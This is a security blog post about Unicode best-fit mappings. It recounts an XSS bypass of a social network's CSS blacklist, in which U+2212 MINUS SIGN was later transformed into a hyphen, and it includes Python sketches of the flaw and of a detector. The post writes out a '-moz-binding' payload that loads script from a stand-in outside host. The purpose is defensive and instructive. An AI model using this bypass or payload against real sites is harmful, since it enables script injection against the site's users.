Unicode security attacks and test cases – Best-fit mappings and String transformations
07 May 2009
Best-fit mappings are another complex topic in Unicode, easily overlooked or misunderstood. On the defensive side, if you can remember only two things, make them these:
- Converting to Unicode is safe.
- Converting between legacy character sets is dangerous.
Ah, forget it. Unfortunately it’s more complicated than that, because basic string handling can also trigger best-fit behavior even when you aren’t intentionally converting between encodings or charsets.
The term best-fit mapping describes how a character gets represented when it has no exact equivalent in the destination character set: the converter substitutes whatever it considers the closest match.
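To make the definition concrete, here is a minimal sketch of a best-fit conversion. The `BEST_FIT` table and the `best_fit_encode` function are hypothetical names written for this illustration. The table is a tiny hand-picked subset, not a copy of any vendor's real mapping file, and real converters differ in which characters they map and to what.

```python
# Hypothetical, hand-written best-fit table for illustration only.
BEST_FIT = {
    "\u2212": "-",  # MINUS SIGN -> HYPHEN-MINUS
    "\uff1c": "<",  # FULLWIDTH LESS-THAN SIGN -> LESS-THAN SIGN
    "\uff1e": ">",  # FULLWIDTH GREATER-THAN SIGN -> GREATER-THAN SIGN
}


def best_fit_encode(text: str, charset: str = "ascii") -> bytes:
    """Encode text, substituting a 'close enough' character when needed."""
    out = bytearray()
    for ch in text:
        try:
            # The character has an explicit place in the destination charset.
            out += ch.encode(charset)
        except UnicodeEncodeError:
            # No explicit place: fall back to the best-fit table, else "?".
            out += BEST_FIT.get(ch, "?").encode(charset)
    return bytes(out)


converted = best_fit_encode("\u2212moz\u2212binding")
```

The point to notice is that the output contains characters the input never had, so any check performed on the input says nothing about the output.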
I’ve actually pulled off some interesting cross-site scripting attacks by exploiting best-fit mappings. In 2008 I was testing a popular social networking app. They had just implemented a new profile editor, complete with user-controlled CSS. They were smart, though: they knew that stuff like this would lead to XSS:
-moz-binding: url(http://nottrusted.com/gotcha.xml#xss)
So they implemented some sort of blacklist because, well, that’s common. Anyway, somewhere in the call stack of their parsing and filtering, the string I passed in was being transformed. To get to the point, I eventually figured out I could craft the input with a character that would pass through their filter and come out the other side transformed into the character I needed. The input:
−moz−binding: url(http://nottrusted.com/gotcha.xml#xss)
The first character here is U+2212 MINUS SIGN (−), which was being transformed through an apparent best-fit mapping into U+002D HYPHEN-MINUS (-).
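The app's real code isn't known, so the following is only a hypothetical sketch of the ordering problem: a blacklist check runs on the raw input, and a transformation further down the call stack changes the string afterwards. The names `passes_blacklist` and `later_transformation` are assumptions, and the single `replace` call stands in for whatever conversion actually happened.

```python
MINUS_SIGN = "\u2212"  # looks like "-" but is not U+002D

# Hypothetical blacklist: the one string the filter is assumed to block.
BLACKLIST = ("-moz-binding",)


def passes_blacklist(css: str) -> bool:
    """Return True when none of the blacklisted strings appear."""
    lowered = css.lower()
    return not any(bad in lowered for bad in BLACKLIST)


def later_transformation(css: str) -> str:
    """Stand-in for the conversion that happened after filtering."""
    return css.replace(MINUS_SIGN, "-")


payload = (
    f"{MINUS_SIGN}moz{MINUS_SIGN}binding: "
    "url(http://nottrusted.com/gotcha.xml#xss)"
)

# Vulnerable order: filter the raw input, transform it afterwards.
accepted = passes_blacklist(payload)
stored = later_transformation(payload)

# Safer order: transform first, then filter what will actually be emitted.
accepted_after_transform = passes_blacklist(later_transformation(payload))
```

In this sketch the payload is accepted by the filter, yet `stored` contains the blocked `-moz-binding` string. Running the same filter on the transformed string rejects it, which is why validation needs to happen after the last transformation, not before it.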
The Watcher security testing tool I released a few months ago has a new check coming to detect string transformations like this. The plan is to flag spots where strings can be manipulated to pull off attacks like the one I just described. Does anyone want to test this, and are there any other good stories about manipulating best-fit mappings to pull off attacks?
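For anyone who wants to experiment before that check ships, here is a rough sketch of the general idea. It is not Watcher's implementation. The `round_trip` callable is a hypothetical stand-in for "send a value to the app and read back what it echoes", and the `PROBES` table is a small assumed set of look-alike characters paired with the ASCII characters they might turn into.

```python
from typing import Callable, Dict, List, Tuple

# Assumed probe set: look-alike character -> ASCII character it may become.
PROBES: Dict[str, str] = {
    "\u2212": "-",   # MINUS SIGN
    "\uff1c": "<",   # FULLWIDTH LESS-THAN SIGN
    "\uff1e": ">",   # FULLWIDTH GREATER-THAN SIGN
    "\uff02": '"',   # FULLWIDTH QUOTATION MARK
}


def find_transformations(
    round_trip: Callable[[str], str],
) -> List[Tuple[str, str]]:
    """Report probes that come back as their ASCII look-alike."""
    findings = []
    for probe, ascii_char in PROBES.items():
        # Wrap the probe in a marker so it can be located in the response.
        sent = f"zq{probe}qz"
        expected_if_mapped = f"zq{ascii_char}qz"
        if expected_if_mapped in round_trip(sent):
            findings.append((probe, ascii_char))
    return findings


# Example with a fake app that only maps the minus sign.
def fake_app(value: str) -> str:
    return "<p>" + value.replace("\u2212", "-") + "</p>"


results = find_transformations(fake_app)
```

Each finding is a character that a filter would see in one form and the browser would receive in another, which makes it a candidate for the kind of bypass described above.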